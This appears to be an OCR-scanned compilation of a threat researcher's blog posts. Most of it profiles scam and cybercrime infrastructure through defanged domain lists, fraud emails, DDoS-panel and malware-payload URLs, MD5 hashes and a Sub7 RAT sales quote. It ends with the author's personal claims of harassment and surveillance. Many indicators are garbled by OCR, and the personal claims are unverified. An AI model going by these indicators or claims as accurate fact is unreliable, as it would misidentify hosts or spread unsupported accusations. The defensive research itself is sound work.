information and knowledge citing potential Nation 

Security issues. What should be considered in terms of 
obtaining access to a company's data-base citing poten¬ 
tial National Security issues is the so called notion of 
"government-free" access based type of private sector 

partnership. 

• Talent Acquisition Roles - In today's modern Talent 
Acquisition Wars it should be clearly noted that a select set 

of key individuals can greatly contribute to the overall 
demise of cybercrime internationally taking into consid¬ 
eration the overall demise of the "Wisdom of the Crowds" 
market-segment driven-concept. What should be 

considered when hiring a potential top-notch Cyber Warfare 
and Information Warfare-based type of personnel 

shouldn't be necessary years and decades worth of 
experience but the overall disruptive degree of the individ- 



ual in terms of "making a change" and "making an impact" 
compared to a certification-based-driven crowd of 
individuals. 
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• Central Repository - What the modern U.S Intelligence 
Community can better do to better protect the nation's 
Infrastructure should be considered in something in the lines 
of a central-private-sector driven repository of 

Threat Intelligence type of data including the notion of a 
"government-free" access in terms of obtaining access 

to a public or a proprietary company information and data 
assets. 

1 . https://fas.Or g/ir D/doddir/dod/ i p 3 12.pdf 

2. https://ddanchev.blo as pot.com/2018/10/dancho- 
danchevs-20r0-disa p pearance.html 
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Historical OSINT - Re-Shipping Money Mule 
Recruitment "Your Shipping Panel LLC" Scam Domain 
Portfo¬ 
lio Spotted in the Wild (2019-02-07 10:14) 









The time has come to profile a recently intercepted and 
currently active malicious and fraudulent re-shipping money 

mule recruitment fraudulent campaign successfully enticing 
users into interacting with the rogue and bogus content 

potentially risk-forwarding the risk of the fraudulent 
transaction to the unsuspecting user. 

Sample malicious URL: 

hxxp://you rshippingpanel.com 

Sample Mailing Address: 

One World Trade Center, New York, NY, 10007, USA 

+ 1 (606) 879-0046 

Sample Company Description: 

11 Your Shipping Panel LLC" is successfully positioning the 
company "Founded in 1995, is a package delivery company 
with services to Eastern Europe as well as to all the countries 
of the former Soviet Union. Over the years, Your 

Shipping Panel LLC has grown into an industry leader by 
focusing on the goal of connecting customers in the United 

States with their families, friends and businesses in Eastern 
Europe. This also includes e-commerce between those 

countries. Today, Your Shipping Panel LLC has become a 
dominant force in package delivery with services to Ukraine, 

Russia, Belarus, Moldova, Uzbekistan, Kazakhstan, 
Kyrgyzstan, Georgia, Azerbaijan and Armenia. Our 
specialized 



transportation and logistics services to those countries lead 
the way as the most recognized brand in North America. " 

Sample Screenshots of The Related Web Sites Known 
to Have Been Involved in the Campaign: 
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Related domains known to have participated in the 
campaign: 

hxxp://meestshi pping.com 
hxxp://www.bellwordcourier.site 
hxxp://u nitedmorganexpresslogistics.com 
hxxp://fastexmega-del ivery.com 
hxxp://su premelight-globaldelivery.com 
hxxp://mngcargocou rier.com 
hxxp://fastex-uk.com 
hxxp://beq uem-gh.com 
hxxp://d iamonddeliverys.com 
hxxp://leadasi alogistic.com 


hxxp://d iplomatcourierservices.com 
hxxp://solacec.com 
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Stay tuned for an additional portfolio of re-shipping money 
mule recruitment scam domains to be published 

anytime soon. 
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Historical OSINT - Global Postal Express Re-Shipping 
Mule Recruitment Scam Spotted in the Wild 

(2019-02-07 10:51) 

Continuing the series of post detailing the activities of 
currently circulating malicious and fraudulent spam 
campaigns 

successfully targeting potential money mule recruiters I've 
recently came across to Global Postal Express which 

basically: 

" We Provide best in service global logistics through our 
people by building lasting relationships with the com¬ 
mitment to prioritize our customer needs to generate 
financial results. Be the leader in the development of 
integrated 

logistics strategies by offering the highest levels of quality, 
reliability and exceptional customer service while strategi¬ 
cally growing nationally and internationally 11 


Sample malicious URL known to have participated in 
the campaign: 

hxxp://globalpostalexpress.net - Email: 
globalpostalexpressinc@gmail.com 

Sample Mailing Address: 

2549 Harris Ave, Sacramento,CA 95838, U.S.A 
+ 1 (719) 838 2416 

Sample Screenshots of the Service in Action: 
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Sample Screenshots of the Related Malicious 
Domains Known to Have Participated in the 
Campaign: 

424 






Related malicious URLs known to have to participated 
in the campaign: 

hxxp://www. marannata.com 

hxxp://wel I burton.com 


hxxp://stecoexpress.com 
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hxxp://mag-trad ing.com 

St ay tuned for an additional set of details regarding re¬ 
shipping money mule recruitment domain portfolios anytime 

soon. 
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Historical OSINT - Able Express Courier Service Re- 
Shipping Mule Recruitment Scam Spotted in the Wild 

(2019-02-07 12:14) 

I've recently intercepted a currently circulating malicious and 
fraudulent spam campaign successfully impersonating 

" Able Express Courier Service" to utilize a re-shipping 
mule recruitment scam potentially targeting tens of 
thousands of unsuspecting users globally. 

Sample malicious URL known to have participated in 
the campaign: 

hxxp://ablecs.biz - 104.31.82.184 - Email: 
phyllisjhurst@grr.la 

Sample Mailing Address: 

PO Box 34459 


Bartlett, TN 38184-0459 


United States 


+ 1 (888) 597-5808 

The service is positioning itself as " Able Express Courier 
Service has been providing forwarding services for 

more than three years now. Our staff consists of experienced 
professionals who regularly get certified and verified for 

competency Over the years, Test Com pant inc has delivered 
packages to a variety of places and gained many major 

business partners all around the world. " 

Sample Screenshots of the Malicious and Fraudulent 
Service: 
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St ay tuned for an additional set of det ails regarding re¬ 
shipping money mule recruitment scams to be publishe 


anytime soon. 


431 


£ 


Historical OSINT - Profiling a Typosquatted Facebook 
and Twitter Impersonating Fraudulent and Malicious 

Domains Portfolio (2019-02-07 15:47) 

With cybercriminals continuing to populate the cybercrime 
ecosystem with hundreds of malicious released including 

a variety of typosquatted domains it shouldn't be surprising 
that hundreds of thousands of users continue falling 

victim to fraudulent and malicious malware and exploits 
serving schemes. 

In this post I'll profile a currently active fraudulent and 
malicious typosquatted domain portfolio successfully 

impersonating Facebook and Twitter for the purpose of 
enticing users into interacting with the rogue and malicious 

domains. 

Related domains known to have participated in the 
campaign: 

hxxp://sm-url.info 

hxxp://sm-urls.info 

hxxp://smurls.info 

hxxp://smirl.info 
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hxxp://smalladdr.info 

hxxp://sm-irl.info 

hxxp://tnylnk.info 

hxxp://tnysite.info 

hxxp://smalink.info 

hxxp://profi lei ink. info 

hxxp://muypix.info 

hxxp://profilehoster.info 

hxxp://quiklynk.info 

hxxp://tnyur.info 

hxxp://skurls.info 

hxxp://smrls.info 

hxxp://smulrs.info 

hxxp://snurls.info 

hxxp://link-out.info 

hxxp://make-small.info 

hxxp://make-tiny.info 

hxxp://makesmall.info 

hxxp://maketiny.info 

hxxp://maketny.info 



hxxp://meh profile, info 

hxxp://muh profile, info 

hxxp://quickprofile.info 

hxxp://quikl ink. info 

hxxp://quikprofile.info 

hxxp://small-url.info 

hxxp://smalllink.info 

hxxp://tinyout.info 

hxxp://go-out.info 

hxxp://out-link.info 

hxxp://tny-url.info 

hxxp://posta-l ink. info 

hxxp://tiny-out.info 

hxxp://private-pics.info 

hxxp://private-pix.info 

hxxp://coool-pics.info 

hxxp://sxypics.info 

hxxp://sxypix.info 

hxxp://my-l ink-out. info 

hxxp://my-lynk.info 



hxxp://go-to-my-pix.info 

hxxp://my-profile-lnk.info 

hxxp://smaller-l ink. info 

hxxp://smaller-urls.info 

hxxp://pics-url.info 

hxxp://pix-url.info 

hxxp://quick-pix.info 

hxxp://quick-profile.info 

hxxp://pics-l inks, info 

hxxp://pix-links.info 
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hxxp://check-my-pics.info 
hxxp://check-my-profile.info 
hxxp://check-my-l ink. info 
hxxp ://cl ick-l inks, info 
hxxp://my-photo-profile.info 
hxxp ://photo-profile. info 
hxxp ://my-video-profile. info 
hxxp://video-profile.info 
hxxp ://hotvideoprofile. info 



hxxp://my-videos-profile.info 

hxxp://myphotoprofile.info 

hxxp://mypictu reprofile, info 

hxxp://mysexyphotos.info 

hxxp://mysexypix.info 

hxxp://mysexyvideos.info 

hxxp://mysexyvids.info 

hxxp://mysxyphotos.info 

hxxp://mysxypics.info 

hxxp://mysxypictu res. info 

hxxp://mysxyprofile.info 

hxxp://mysxyvideos.info 

hxxp://mysxyvids.info 

hxxp://myvideoprofile.info 

hxxp://myvideosprofile.info 

hxxp://profi I e-link, info 

hxxp://sxy profiles, info 

hxxp://myhotphotos.info 

hxxp://myhotpictu res. info 

hxxp://myhotprofile.info 



hxxp://myhotvideos.info 

hxxp://myhotvids.info 

hxxp://my-photos-r-cool.info 

hxxp://my-profile-page.info 

hxxp://my-cool-profile.info 

hxxp://my-photo-spot.info 

hxxp://my-profi le-spot.i nfo 

hxxp://my-video-spot.info 

hxxp://myphotopages.info 

hxxp://myprofilepages.info 

hxxp://photo-pages.info 

hxxp://profile-pages.info 

hxxp://videoz-profile.info 

hxxp://myphoto-gallery.info 

hxxp://myphoto-spot.info 

hxxp://myvideo-spot.info 

hxxp://myvideospot.info 

hxxp://show-my-pictu res. info 

hxxp://show-my-videos.info 

hxxp://show-my-vids.info 



hxxp://show-off-pics.info 
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hxxp://show-off-vids.info 

hxxp://show-your-photos.info 

hxxp://check-my-page.info 

hxxp://show-my-picx.info 

hxxp://show-my-vidds.info 

hxxp://my-profile-site.info 

hxxp://profi I e-sites, info 

hxxp://profile-space.info 

h xx p: //v i e w- my- p rofi I e. i nf o 

h xx p: //v i e w- p rofi I e. i n f o 

hxxp://profile-link2.info 

hxxp://profile-link3.info 

hxxp://profile-link4.info 

hxxp://profile-link5.info 

hxxp://profile-link6.info 

hxxp://profile-link7.info 

hxxp://profile-link8.info 

hxxp://twitpic-l.info 



hxxp://twitpic-2.info 

hxxp://twitpic-3.info 

hxxp://twitpic-4.info 

hxxp://my-pictures-domain.info 

hxxp://photo-profi I e-sites, info 

hxxp://pictu re-profile-site, info 

hxxp://pictu re-profile-sites, info 

hxxp://pictu re-profiles, info 

hxxp://video-profile-site.info 

hxxp://video-profile-sites.info 

hxxp://my profile-site, info 

hxxp://photo-gallery-sites.info 

hxxp://photogallery-site.info 

hxxp://photogallery-sites.info 

hxxp://theprofileiste.info 

hxxp://photo-galleries-l.info 

hxxp://photo-galleries-10.info 

hxxp://photo-galleries-2.info 

hxxp://photo-galleries-3.info 

hxxp://photo-galleries-4.info 



hxxp://photo-galleries-5.info 
hxxp://photo-galleries-6.info 
hxxp://photo-galleries-7.info 
hxxp://photo-galleries-8.info 
hxxp://photo-galleries-9.info 
hxxp://unrated-profiles-l.info 
hxxp://unrated-profiles-10.info 
hxxp ://u n rated-profi I es-2. i nfo 
hxxp ://u n rated-profi Ies-3. i nfo 
hxxp ://un rated-profi les-4. info 
hxxp ://u n rated-profi Ies-5. i nfo 
hxxp ://u n rated-profi Ies-6. i nfo 
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hxxp ://u n rated-profi Ies-7. i nfo 
hxxp ://u n rated-profi Ies-8. i nfo 
hxxp ://u n rated-profi I es-9 .info 
hxxp ://un rated-profi le-1. info 
hxxp ://un rated-profi le-10. info 
hxxp ://un rated-profi le-2. info 
hxxp ://un rated-profi le-3. info 




hxxp://unrated-profile-4.info 
hxxp://unrated-profile-5.info 
hxxp://unrated-profile-6.info 
hxxp://unrated-profile-7.info 
hxxp ://u n rated-profi I e-8. i nfo 
hxxp://unrated-profile-9.info 
hxxp ://r-rated-photos-l. info 
hxxp ://r-rated-photos-10. info 
hxxp ://r-rated-photos-2. info 
hxxp ://r-rated-photos-3. info 
hxxp ://r-rated-photos-4. info 
hxxp ://r-rated-photos-5. info 
hxxp ://r-rated-photos-7. info 
hxxp ://r-rated-photos-8. info 
hxxp ://r-rated-ph otos-9. i nfo 
hxxp://r-rated-profile-l.info 
hxxp://r-rated-profile-10.info 
hxxp://r-rated-profile-2.info 
hxxp ://r-rated-profi I e-3. i nfo 
hxxp://r-rated-profile-4.info 



hxxp://r-rated-profile-5.info 
hxxp ://r-rated-profi I e-6. i nfo 
hxxp ://r-rated-profi I e-7. i nfo 
hxxp ://r-rated-profi I e-8. i nfo 
hxxp://r-rated-profile-9.info 
hxxp://unrated-gallery-l.info 
hxxp://unrated-gallery-10.info 
hxxp://unrated-gallery-2.info 
hxxp://unrated-gallery-3.info 
hxxp://unrated-gallery-4.info 
hxxp://unrated-gallery-5.info 
hxxp://unrated-gallery-6.info 
hxxp://unrated-gallery-7.info 
hxxp ://u n rated-g a 11 ery-8. i nfo 
hxxp ://u n rated-g a 11 ery-9. i nfo 
hxxp ://profile-unrated-l. info 
hxxp ://profile-unrated-10. info 
hxxp ://profile-unrated-2. info 
hxxp://profile-unrated-3.info 
hxxp://profile-unrated-4.info 





hxxp://profile-unrated-5.info 
hxxp://profile-unrated-6.info 
hxxp ://p rofi I e-u n rated-7. i nfo 
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hxxp ://p rofi I e-u n rated-8. i nfo 

hxxp://profile-unrated-9.info 

hxxp://iprosa.com 

hxxp://sm-urls.com 

hxxp://snkirl.com 

hxxp://tnulk.com 

hxxp://smulx.com 

hxxp ://tnysnorl. com 

hxxp://supalnk.com 

hxxp ://tny web.com 

hxxp://smlnk.com 

hxxp ://profi I ehoster.com 

hxxp ://make-small.com 

hxxp ://my-l ink-out.com 

hxxp://url-out.com 

hxxp ://profi I e-out.com 



hxxp://tiny-out.com 
hxxp://posta-l ink.com 
hxxp://coool-pics.com 
hxxp://twitpics-l.com 
hxxp://twitpics-4.com 
hxxp://twitpics-2.com 
hxxp://twitpics-3.com 
hxxp://profi le-video-gallery.com 
hxxp://fb-photo-gal lery.com 
hxxp://fb-gal lery.com 
hxxp://profile-photo-gal lery.com 
hxxp://profi legal lerysite.com 
hxxp://profi lepicturesite.com 
hxxp://my-profile-gal lery.com 
hxxp://profile-gal lery.com 
hxxp://profile-gal leries.com 
hxxp://her-profile-pictures.com 
hxxp://her-pictu re-sites.com 
hxxp://her-photo-site.com 
hxxp://g allery-link.com 



hxxp://her-photo-sites.com 
hxxp://her-profile-photos.com 
hxxp://her-profile-out.com 
hxxp://her-profi les.com 
hxxp://her-pictu re-site.com 
hxxp://photosites-now.com 
hxxp://photos-for-fb.com 
hxxp://photosforfb.com 
hxxp://photo-gal leries-onilne.com 

Stay tuned for an updated set of typosquatted malicious and 
fraudulent domains impersonating popular brands to 

be published anytime soon. 
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Historical OSINT - Profiling a Rogue and Malicious 
Domain Portfolio of OEM-Pirated Software 

( 2019 - 02-07 17 : 27 ) 

In a cybercrime-ecosystem dominated by fraudulent and 
malicious releases cybercriminals continue relying on 

fraudulent and potentially-malicious affiliate-based type of 
revenue-sharing schemes for the purpose of serving 

fraudulent and malicious software to thousands of 
unsuspecting users including OEM-powered pirated software 
to 



millions of users globally. 

In this post I'll profile a currently active fraudulent and 
malicious domain portfolio of OEM-powered pirated- 

software serving fraudulent and malicious domains. 

Related domains known to have participated in the 
campaign: 

hxxp://store-software-7.com - Email: altsrv@gmail.com 

hxxp://oem-store-software-7.com - Email: altsrv@gmail.com 

hxxp://store-digital-software-7.com - Email: 
altsrv@gmail.com 

hxxp://oem-digital-software-7.com - Email: altsrv@gmail.com 

hxxp://shop-digital-software-7.com - Email: altsrv@gmail.com 

hxxp://buy-shop-software-7.com - Email: altsrv@gmail.com 

hxxp://buyshop-software-7.com - Email: altsrv@gmail.com 

hxxp://store-buy-software-7.com - Email: altsrv@gmail.com 

hxxp://digital-shopsoftware-7.com - Email: altsrv@gmail.com 

hxxp://buy-shopsoftware-7.com - Email: altsrv@gmail.com 

hxxp://digitalbuysoftware-7.com - Email: altsrv@gmail.com 

hxxp://software-digital-store-7.com - Email: 
altsrv@gmail.com 

hxxp://buy-shop-digital-7.com - Email: altsrv@gmail.com 
hxxp://buyshop-digital-7.com - Email: altsrv@gmail.com 



hxxp://buy-soft-digital-7.com - Email: altsrv@gmail.com 
hxxp://soft-buy-digital-7.com - Email: altsrv@gmail.com 
hxxp://softbuy-digital-7.com - Email: altsrv@gmail.com 
hxxp://softwaredigital-7.com - Email: altsrv@gmail.com 
hxxp://buy-softdigital-7.com - Email: altsrv@gmail.com 
hxxp://softbuydigital-7.com - Email: altsrv@gmail.com 
hxxp://storesoftware-oem-7.com - Email: altsrv@gmail.com 
hxxp://digitalsoftware-oem-7.com - Email: altsrv@gmail.com 
hxxp://store-oem-7.com - Email: altsrv@gmail.com 
hxxp://soft-buy-oem-7.com - Email: altsrv@gmail.com 
hxxp://digital-storeoem-7.com - Email: altsrv@gmail.com 
hxxp://digitaloem-7.com - Email: altsrv@gmail.com 
hxxp://digital-buyoem-7.com - Email: altsrv@gmail.com 
hxxp://digitalbuy-shop-7.com - Email: altsrv@gmail.com 
hxxp://buyoem-soft-7.com - Email: altsrv@gmail.com 
hxxp://digital-buy-soft-7.com - Email: altsrv@gmail.com 
hxxp://digitalbuy-soft-7.com - Email: altsrv@gmail.com 
hxxp://digital-buysoft-7.com - Email: altsrv@gmail.com 
hxxp://digitalbuysoft-7.com - Email: altsrv@gmail.com 
hxxp://shopsoftware-buy-7.com - Email: altsrv@gmail.com 



hxxp://software-store-buy-7.com - Email: altsrv@gmail.com 
hxxp://digitalshop-buy-7.com - Email: altsrv@gmail.com 
hxxp://digital-soft-buy-7.com - Email: altsrv@gmail.com 
hxxp://digitalsoft-buy-7.com - Email: altsrv@gmail.com 
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hxxp://software-digitalbuy-7.com - Email: altsrv@gmail.com 

hxxp://oem-digitalbuy-7.com - Email: altsrv@gmail.com 

hxxp://softdigitalbuy-7.com - Email: altsrv@gmail.com 

hxxp://digital-softbuy-7.com - Email: altsrv@gmail.com 

hxxp://digitalsoftbuy-7.com - Email: altsrv@gmail.com 

hxxp://digitaltributary.com - Email: altsrv@gmail.com 

hxxp://oemstore-software-7.ru - Email: 
mikepaninl990@gmail.com 

hxxp://digital-buy-software-7.ru - Email: 
mikepaninl990@gmail.com 

hxxp://shop-buy-software-7.ru - Email: 
mikepaninl990@gmail.com 

hxxp://buydigitalsoftware-7.ru - Email: 
mikepaninl990@gmail.com 

hxxp://digital-buysoftware-7.ru - Email: 
mikepaninl990@gmail.com 

hxxp://buysoftware-store-7.ru - Email: 
mikepaninl990@gmail.com 



hxxp://software-buy-store-7.ru - Email: 
mikepani nl990@gmail.com 

hxxp://buysoftwarestore-7.ru - Email: 
mikepaninl990@gmail.com 

hxxp://oem-digitalstore-7.ru - Email: 
mikepaninl990@gmail.com 

hxxp://software-oemstore-7.ru - Email: 
mikepaninl990@gmail.com 

hxxp://store-digital-7.ru - Email: mikepaninl990@gmail.com 

hxxp://storeoem-digital-7.ru - Email: 
mikepaninl990@gmail.com 

hxxp://oembuy-digital-7.ru - Email: 
mikepaninl990@gmail.com 

hxxp://shop-softwaredigital-7.ru - Email: 
mikepaninl990@gmail.com 

hxxp://softwarebuydigital-7.ru - Email: 
mikepaninl990@gmail.com 

hxxp://store-software-oem-7.ru - Email: 
mikepaninl990@gmail.com 

hxxp://buy-software-oem-7.ru - Email: 
mikepaninl990@gmail.com 

hxxp://software-digital-oem-7.ru - Email: 
mikepaninl990@gmail.com 

hxxp://storedigital-oem-7.ru - Email: 
mikepaninl990@gmail.com 



hxxp://softwareoem-7.ru - Email: mikepaninl990@gmail.com 

hxxp://digitalsoftwareoem-7.ru - Email: 
mikepaninl990@gmail.com 

hxxp://softwarestoreoem-7.ru - Email: 
mikepaninl990@gmail.com 

hxxp://buysoftwareshop-7.ru - Email: 
mikepaninl990@gmail.com 

hxxp://software-digitalshop-7.ru - Email: 
mikepaninl990@gmail.com 

With software piracy continuing to increase and proliferate it 
shouldn't be surprising that rogue and fraudu¬ 
lent affiliate-based type of networks will continue to make 
impact globally potentially exposing millions of user to a 

variety of risks including malicious software. 

Stay tuned for an updated set of fraudulent and malicious 
piracy-themed portfolio of domains to be published 

anytime soon. 
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Historical OSINT - A Peek Inside The Georgia 
Government's Web Site Compromise Malware Serving 
Cam¬ 
paign - 2010 (2019-02-07 17:30) 

Remember the massive [l]Russia vs Georgia cyber 

attack circa 2009? It seems that the time has come for me 


to 


dig a little bit deeper and provide [2]actionable 
intelligence on one of the actors that seem to have 
participated in 

the campaign including a sample Pro-Georgian type of Cyber 
Militia that apparently attempted to "risk-forward" the 

responsibility for waging Cyberwar to third-parties including 
Russian and Anti-Georgia supporters. 

How come? In this post I'll provide actionable intelligence on 
what appears to be a currently active Brazilian 

supporter of the Cyber Attacks that took place circa 2009 
with the idea to discuss in-depth the tools and motivation 

for launching the campaign of the cybercriminals behind it. 

Sample malicious URL known to have participated in 
the campaign: 

hxxp://geocities.ws/thezart/ 
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It's 2010 and I'm coming across to a malicious and fraudulent 
file repository that can be best described as a 

key actor that managed to participate perhaps even 
orchestrate the Russia vs Georgia cyber attacks circa 2009. 
Who 

is this individual? How did he manage to contribute to the 
Russian vs Georgia cyber attacks? Did he rely on active 


outsourcing or was he hired to perform the orchestrated 
DDoS for hire attacks that took place back then? Keep 

reading. 

It appears that a Brazilian user known as The Zart managed 
to participated in the Russia vs Georgia cyber at¬ 
tacks circa 2009 relying on a variety of tools and techniques 
known as: 

- DNS Amplification Attacks 

- Web Site Defacement Tools 

-Targeted Spreading of Vulnerable Legitimate Web Sites 

- Automated Web-Site Exploitation - Long Tail of The 
Malicious Web 

which basically resulted in a self-mobilized militia that 
actually participated and launched the Russia vs Geor¬ 
gia cyber attacks circa 2009. 

Related posts: 

[3] The Russia vs Georgia Cyber Attack 

[4] Who's Behind the Georgia Cyber Attacks? 

[5] DDoS Attack Graphs from Russia vs Georgia's 
Cyberattacks 

[6] Real-Time OSINT vs Historical OSINT in Russia/Georgia 
Cyberattacks 



1. http:// aeora iaupdate. a ov. a e/doc/10006922/CYBERWAR- 
%20fd 2 . odf 


2. http://blo a .sucuri.net/2010/02/ a eor a ia- a overnment-sites- 
hacked-and.html 
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3. https://ddanchev.blo as pot.com/2008/Q8/the-russia-vs- 
aeora ia-cvber-attack.html 

4. https://ddanchev.blo as pot.com/2008/Q8/who-behind- 
g eor g ia-cvber-attacks.html 

5. https://ddanchev.blo as pot.com/2008/10/ddos-attack- 
ara phs-from-russia-vs.html 

6. https://ddanchev.blo as pot.com/2008/10/real-time-osint-vs- 
historical-osint-in.html 
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Historical OSINT - Profiling a Portfolio of Fake Visa 
Application Scam Domains (2019-02-07 17:56) 

It's been a while since I last posted a quality update profiling 
a versatile currently circulating malicious and fraudulent 

spam campaign profiling and highlighting the fraudulent and 
malicious activities of the cybercriminals behind the 

campaign. 

In this post I'll profile a currently circulating Fake Visa 
Application fraudulent campaign enticing users into sub¬ 
mitting their personal details for the purpose of obtaining a 
fake and rogue visa. 


























Related emails known to have participated in the 
campaign: 

vizagold2010@mail.ru 

qwerty _ok@bigmir.net 

vizacomlO@bigmir.net 

Abrakadabra011@yandex.ua 

alexboy40@meta.ua 

vizacom09@bigmir.net 

bestagancy@rambler.ru 

vizagold2010@mail.ru 

vizagold2010@gmail.com 

vizacom01@ua.fm 

Vizacom01@gmail.com 

Vizacom01@ukr.net 

Vizacom01@qip.ru 

visas _com@ukr.net 

Visas.com2010@gmail.com 

infinite-visas@rambler.ru 

unforeseen2010@hotmail.com 

shengen _visas@ukr.net 



shengenvisas@gmail.com 

shengenvisas@rambler.ru 

shengenvisas@bigmir.net 

Stay tuned for an updated set of malicious and fraudulent 
Fake Visa Application domain portfolio to be pub¬ 
lished anytime soon. 
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Historical OSINT - Sub7 Crew Releases New Version 
on 11th Anniversary of The RAT (2019-02-07 18:03) 

It's 2010 and I've recently came across to the following 
announcement at Sub7's Main Forum - the most ubiquitous 

trojan horse also known as Remote Access Tool circa the 90's 
on the upcoming release of a new version. 

11 People can buy unique FUD servers in the shop and custom 
clients can also be written to help you admin PC's 

remotely with your own features. These are selling well so be 
sure to grab your own custom version while we are 

offering them at this price. Please be advised there is 
currently a waiting list for this. " 

Sample detection rate: 

- [l]borlndmm.dll - Result: 0/42 (0 %) 

- [2JEditServer.exe - Result: 10/42 (23.81 %) 


- [3]Server.exe - Result: 18/41 (43.91 %) 

- [41SubSeven.exe - Result: 16/41 (39.03 %) 

Should The Scene the way we know it re-appear the way we 
know it? It appears that every then and now a 

new cybercrime-friendly tool is trying to materialize taking us 
back to what used to be The Scene circa the 90's. 

1 . 

https://www.virustotal.com/b a /file/23b0241109dea46fcd433 

d25a48e41f95cf2d7ea589f72f4e2948706de3e0657/anal vs 

is L 
2 . 

https://www.virustotal.com/b a /file/35e843125f2efl0925c856 

a0a39000a8df368fb8499cd0d47dl2b5de728a222c/anal vs 

Is L 

3. 

https://www.virustotal.com/b a /file/2ba3217268b2d737a542e 

7b7840a4480c655b2b9414d4c57e8blc8bfa76322c8/anal vs 

is L 

4. 

https://www.virustotal.com/b a /file/0d0d9ba70ab502cdla61d 

0913ae9e9853131079e22881a2f527bf699029824ad/anal vs 

is/ 
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Historical OSINT - "I Know Who DDoS-ed Georgia and 
Bobbear.co.uk Last Summer" (2019-02-07 20:30) 

Appreciate my rhetoric. In this post I'll provide actionable 
intelligence on a key DDoS for hire service that was pri¬ 
marily used in the [l]Russia vs Georgia Cyber Attacks 
circa 2009 including the [2]DDoS attack against 
Bobbear.co.uk. 

Related actionable intelligence on the campaign: 

hxxp://setx.in - Email: info@antiddos.eu - 
setx.mail@gmail.com - hxxp://httpdoc.info - 
hxxp://fakamaza.info. The 

last one with the email address M team@russia-vs-georgia.org" 
in the WHOIS info. 

Related malicious URLs known to have participated in 
the campaign: 

hxxp://cxi rn.inattack.ru/www7/www/auth.php 

Related malicious URLs known to have participated in 
the campaign: 

hxxp://h 2 78666y.net/main/load.exe 
hxxp://h 2 78666y.net/www/auth.php 

Related malicious MD5s known to have participated 
in the campaign: 

MD5: 34413180d372a9e66d0d59baf0244b8f 
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MD5: 42e4bbd47d322ec563c86c636c3fl0b9 


MD5: ed36b42fac65236a868e707ee540c015 
MD5: c9falc95ab4eclcld46abe5445fb41e4 
hxxp://cxi rn.inattack.ru/www3/www/ 
hxxp://i.clusteron.ru/bstatus.php 

Related malicious URLs known to have participated in 
the campaign: 

hxxp://svdrom.cn 

Related malicious URLs known to have participated in 
the campaign: 

hxxp://203.117.111.52/www7/www/getcfg.php 

Related malicious domains known to have 
participated in the campaign: 

hxxp://cxi rn.inattack.ru/www2/www/stat.php 

hxxp://cxi rn.inattack.ru/www3/www/stat.php 

hxxp://cxi rn.inattack.ru/www4/www/stat.php 

hxxp://cxi rn.inattack.ru/www5/www/stat.php 

hxxp://cxi rn.inattack.ru/www6/www/stat.php 

hxxp://fi nito.fi .fun pic.org/black/stat.php 

hxxp://logartos.org/forum/stat.php - 195.24.78.242 

hxxp://weberror.cn/bel/stat.php 




hxxp://prosto.pizdos.net/ Jol/stat.php 
hxxp://h278666y.net/www/stat.php - 72.233.60.254 

1. https://ddanchev.blo as pot.com/2019/02/historical-osint- 
peek-mside- a eor a ia.html 

2. https://ddanchev.blo as pot.com/20Q8/ll/the-ddos-attack- 
aa ainst-bobbearcouk.html 
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Announcing Offensive Warfare 2.0 - Official Hacking 
and Security Community Launch (2019-03-22 15:14) 

Dear blog readers, I wanted to let everyone know that I've 
recently launched a public [l]hacking and cyber security 

community repository offering Security Directory 
Downloads Podcasts and Security Videos directory including 
a 

countless number of hacking and security resources 
including a possible hacking and security discussion 
including 

community-based services and products - to keep the spirit 
of the Scene and the Security Industry - the way we know it. 

How to obtain access? 










- consider approaching me at dancho.danchev@hush.com for 
the purpose of requesting an invite 

How you can contribute? 

- feel free to approach your colleagues and friends including 
social network in terms of spreading the word about the 

portal and the community 

- consider registering making an introduction and starting to 
contribute with content 

- approach me directly at - dancho.danchev@hush.com with 
your questions and possible feature and content 

suggestion 

Looking forward to receiving your response including any 
additional questions or comments including sugges¬ 
tions that you might have in terms of the project. 

Stay tuned! 

1. https://www.offensive-warfare.com/lo a in/ 
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Dancho Danchev's 2010 Disappearance - An 
Elaboration - Part Two (2019-04-04 05:51) 



[ 1 ] 


UPDATE: I can be reached at dancho.danchev@hush.com or 
at +359 87 68 93 890 in case of an emergency. 

UPDATE: It appears that recently a car belonging to local 
police department (hxxp://troyan-police.com; police 
_troyan@abv.bg) was stopped somewhere around my place 
with the lights turned on with the idea to provoke a 

possible local police visit. 

UPDATE: It appears that my place was visited for a second 
time by local police officers (hxxp://troyan-police.com; 
police _troyan@abv.bg) with third-party doctors 

(http://mbal-troyan.com; mbal _troyan@abv.bg) for the 

purpose of apparently injecting me and a document for the 
injection was signed by someone that I know. 

UPDATE: It appears that someone managed to twist my arm 
and therefore pressed a pressure on my eye 

without my knowledge with random people attempting to 
communicate with me behind a wall. 

UPDATE: It appears that prior to my presentation at InfoSec 
2012 someone managed to place a plaque on the 

wall in Earl's Court and therefore I experienced a pressure on 
my head while making a presentation. 

UPDATE: It appears that prior to my presentation visit in 
Lyon in 2010 someone managed to wound my mouth with 

something that can be described as wall interference. 

UPDATE: It appears that someone managed to open my eye 
and therefore I'm currently experiencing a pres- 



sure behind a wall with random people attempting to 
communicate with me. 

UPDATE: It appears that I'm currently persistently 
experiencing a pressure on my mouth including something 

in the lines of a toxic chemical on my nose. 

UPDATE: It appears that someone managed to map my 
place including my head and body using rubber and is 

persistently trying to communicate with me. 

UPDATE: In case you're interested in contacting me in terms 
of my law enforcement issues and potential 

kidnapping and harassment attempts including possible 
interview requests - feel free to approach me at dan- 

cho.danchev@hush.com as I'm currently busy looking fora 
full time cybercrime researcher security blogger and 

threat intelligence analyst type of position. 

I would be also definitely looking forward to sharing some of 
my sensitive projects including related work in 

various other sensitive areas with the idea to end the 
ongoing IP (Intellectual Property) robbery courtesy of a 
variety 

of industry-leading companies and individuals. [2]Has the 
time come to work hard and set them straight? It 

appears 

so. Feel free to approach me at dancho.danchev@hush.com 
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You can use the following PGP key to approach me regarding 
possible [3]career opportunities regarding possible 
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involvement in related sensitive projects at 
dancho.danchev@hush.com or just to say hi request 

[4]Threat Data 

access including a sample or a possible trial or make a 
comment regarding my current and [5]historical OSINT 

research including possible references to my 2010 
disappearance including various cybercrime underground 
chatter 

referencing me and my research including disappearance 
and possible kidnapping including possible GCHQ Lovely 

Horse references and related resources and comments. 

Sample Information Security and Information Warfare 
cartoon circa 2008: 


Second Sample Information Security and Information 
Warfare cartoon circa 2008: 

UPDATE: It appears that someone managed to somehow 
place a basketball ball on my head chin and eye and 

therefore I'm currently experiencing a pressure on my eye 
and my face with people attempting to communicate with 

me. 

UPDATE: It appears that someone is attempting to 
